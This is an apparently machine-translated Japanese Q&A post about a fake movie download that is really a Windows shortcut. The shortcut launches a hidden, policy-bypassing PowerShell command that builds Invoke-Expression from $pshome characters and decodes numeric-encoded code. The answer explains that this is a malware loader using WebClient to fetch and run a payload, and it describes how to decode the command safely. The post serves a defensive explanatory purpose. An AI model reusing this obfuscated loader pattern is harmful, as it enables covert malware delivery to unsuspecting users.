Windows 10で、映画だと思ったこのファイルをダウンロードしましたが、サイズが700MBのショートカットでした
ターゲットはこれだ
C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEcByP。 ($ pshOmE [4] + $ PShoMe [30] + 'X')(-JoiN((44、141、163,160、170、40、75、40、50,50、116、145、167,55、117、 142、152、145、143、164、40、123、171、163、164、145、155、56、116
そして、それは
%SYSTEMROOT%\ System32\WindowsPowerShell\v1.0
それは何をするためのものか?
マルウェアローダーです。
New-Object System.N...
(数字で隠されている)で始まるPowerShellコードを実行します。これは、完全なコンテンツではNew-Object System.Net.WebClient
であり、さらに、に隠されているURLから実際のマルウェアをダウンロードして実行するために使用されます。難読化されたコードの追加番号。
すでにリンクをクリックしている場合は、URLがすでに削除されていない限り、すでに感染している可能性があります。
行をメモ帳に貼り付けてから、( -JoiN( (
の前のすべてを削除し、残りの部分(( -JoiN( (
...で始まる)をコピーしてPowerShellウィンドウに貼り付けることができます。通常、前の$pshOmE[4]+$PShoMe[30]+'X')
= iex
= Invoke-Expression
によって実行される難読化されたPowerShellコードが開示されます。